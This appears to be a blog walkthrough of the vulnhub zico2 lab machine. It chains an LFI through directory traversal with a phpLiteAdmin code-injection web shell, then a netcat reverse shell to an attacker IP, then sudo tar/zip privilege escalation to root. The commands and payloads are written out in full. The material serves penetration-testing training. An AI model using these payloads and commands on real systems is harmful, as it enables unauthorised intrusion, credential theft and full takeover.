CTF: zico2 walkthrough

This is a walkthrough on the vulnhub zico2 CTF by Rafael Target IP: 192.168.56.105* * in case anyone who got here doesn’t know how to get the VM IP here’s a useful command: arp-scan -I <interface> –localnet, or just arp-scan –localnet in case you use bridged adapter.  The nmap quick scan shows the following results:
Running an nmap scan on target zico2 - vulnhub CTF walkthrough - d7x blog
# nmap -O -sT -sV –top-ports 1000 192.168.56.105
The full range 1-65535 range nmap scan showed an additional RPC service running on port  58306 recognized by nmap as “status 1 (RPC #100024) The UDP Scan:
UDP Scan on taregt zico2 - vulnhub CTF walkthrough - d7x - PromiseLabs
UDP Scan on taregt zico2 – vulnhub CTF walkthrough

Enumeration

By enumerating the ssh daemon header section* the openssh package disclosed the actual distribution version of the server to be supposedly Ubuntu Precise (12.04) (see the link below, refer to the following package description about openssh 1:5.9p1-5ubuntu1.10 source package on launchpad) *here’s a nice article on enumerating or fingerprinting ssh banners – the title is targeted towards fingerprinting Ubuntu ssh version, but the information can be applied to most package based Linux distributions The Apache 2.2.22 does not seem to be vulnerable to any kind of a remote attack so the next step is to take a look at the web server contents:
Zico's shop - zico2 vulnhub CTF walkthrough - d7x 's blog
Zico’s shop – zico2 vulnhub CTF walkthrough
It’s an almost statically self-linked page with no external links or links to other files residing on the server, a contact email at the bottom* and there isn’t much useful stuff in the source except the link lying under the “CHECK THEM OUT” button leading to another page, obviously including a web page itself passed to it as a GET parameter: * I usually save these in my notes to use as a username wordlist in a potential brute-force attack at a later stage)
internal link on target zico2 - vulnhub CTF walkthrough - d7x - PromiseLabs - blog
Following an internal link pointing to another page – Zico 2 vulnhub CTF walkthrough
Checking out the view.php?page=tools.html page source does not show anything useful either, but a potential LFI attack vector can be immediately noticed in the GET request. After several tests it can be seen that pointing a direct file would not work, however manipulating the page parameter and combining it with a directory traversal technique (this can be discovered either manually using a tool like owasp zap or burp suite by attacking the value of the “page” parameter using either of the tools’ fuzzers) that requesting ../../ followed by a complete path to any filename by manipulating the GET parameter on the web application results in an LFI attack:
Discovering an LFI on target zico2 - vulnhub CTF walkthrough - d7x - PromiseLabs - blog
http://192.168.56.105/view.php?page=../../etc/passwd – zico2 – vulnhub CTF walkthrough – d7x s blog
Running dirb or dirbuster on the target to discover any hidden files & directories,  an important step a tester should never miss, discloses the following interesting files (pay special attention to the /dbadmin folder):
dirb on target zico2 - vulnhub CTF walkthrough - d7x - PromiseLabs - blog
Running dirb on target zico2 – vulnhub CTF walkthrough

The Attack

The dbadmin directory above seems to contain a phpLiteAdmin 1.9.3 installation which is vulnerable to Remote PHP Code Injection​ and is obviously left with default admin password:
phpLiteAdmin 1.9.3 - Remote PHP Code Injection - d7x - PromiseLabs - blog
http://192.168.56.105/dbadmin/test_db.php
 
phpLiteAdmin 1.9.3 - Remote PHP Code Injection - d7x - PromiseLabs - blog
http://192.168.56.105/dbadmin/test_db.php
Trying to save a file using the Remote Command Injection vulnerability in an arbitrary folder does not work on the target, however combining it with the LFI could be used to exploit the vulnerability and turn this into an arbitrary command execution. Taking advantage of the phpLiteAdmin web application exposing its actual paths makes this an easier task:
<? php echo shell_exec($_GET`); ?>
http://192.168.56.105/view.php?page=../../usr/databases/shell.php&cmd=id
And then getting a persistent shell using nc (by including the /usr/databases/shell.php file using the LFI vulnerability and passing a malicious command via the GET cmd parameter :
../../usr/databases/shell.php&cmd=mknod /tmp/backpipe p; /bin/sh 0</tmp/backpipe | nc <attacker's IP> 443 1>/tmp/backpipe
Getting a persistent shell on target zico2 - vulnhub CTF walkthrough - d7x - PromiseLabs blog
http://192.168.56.105/view.php?page=../../usr/databases/shell.php&cmd=mknod%20/tmp/backpipe%20p;%20/bin/sh%200%3C/tmp/backpipe%20|%20nc%20192.168.56.137%20443%201%3E/tmp/backpipe
 

Privilege Escalation

Finding a password on target zico2 - vulnhub CTF walkthrough - d7x - PromiseLabs
Finding a password on target zico2 – vulnhub CTF walkthrough
After initiating the persistent shell and browsing through the /home/zico directory, a password can be seen within the wp-config.php wordpress configuration file: Trying the above password on user zico provides a valid system shell:
Successful authentication with user zico - vulnhub CTF walkthrough - d7x - PromiseLabs
Successful authentication with user zico – vulnhub CTF walkthrough
The sudo -l command shows that user zico can execute sudo commands without being prompted for a password using the /bin/tar and /usr/bin/zip binaries:
sudo -l on target zico2 - the /bin/tar and /usr/bin/zip binaries can execute sudo commands - vulnhub CTF walkthrough - d7x - PromiseLabs
sudo -l on target zico2 – the /bin/tar and /usr/bin/zip binaries can execute commands with sudo privileges without being prompted for a password
Now to escalate privileges*, as both tar and zip binaries provide the option to execute a command upon archiving/dearchiving, either of the following commands could be used: *here’s a nice article from SANS on  Linux Privilege Escalation Techniques of 2016​ Privilege Escalation Using the tar command:
sudo /bin/tar -c -f /tmp/zico.zip . --checkpoint=1 --checkpoint-action=exec='sudo su'
sudo /bin/tar -c -f /tmp/zico.zip . --checkpoint=1 --checkpoint-action=exec='sudo su'
Privilege Escalation using tar – zico2 vulnhub CTF walkthrough
Privilege Escalation using the zip Linux command: I had to do a bit of a research to understand how sudo can be used to escalate privileges using the zip binary until I figured out that the zip filename is actually appended to the command of choice, so you have to interrupt it using a terminating “#” (comment) string to keep the syntax in a neat state. The Solutions to the Sudo Challenge!​ by Sebastien Mackeexplains provides a simple description on this in a similar way as the one I used described below. My way of doing thisi was as following: As the -T zip linux command option is actually used to test the integrity of zip archives, and the –unzip-command is used to swap the command with one of a choice, one could just issue a sudo su command and terminate it to avoid including the appended filename string as following:
sudo /usr/bin/zip -T wordpress-4.8.zip --unzip-command='sudo su #'
Another option is to use ‘/bin/bash #‘ or ‘/bin/bash -i #‘ instead of sudo, I personally prefer using sudo as I consider it’s the more straight-forward and elegant way.
sudo /usr/bin/zip -T wordpress-4.8.zip --unzip-command='sudo su #' - zico2 - vulnhub CTF walkthrough - d7x
Privilege Escalation using zip
And here’s the flag:
Capturing the flag on target zico2 - vulnhub CTF walkthrough - d7x - PromiseLabs
Capturing the flag on target zico2 – vulnhub CTF walkthrough

Leave a Reply

Your email address will not be published. Required fields are marked *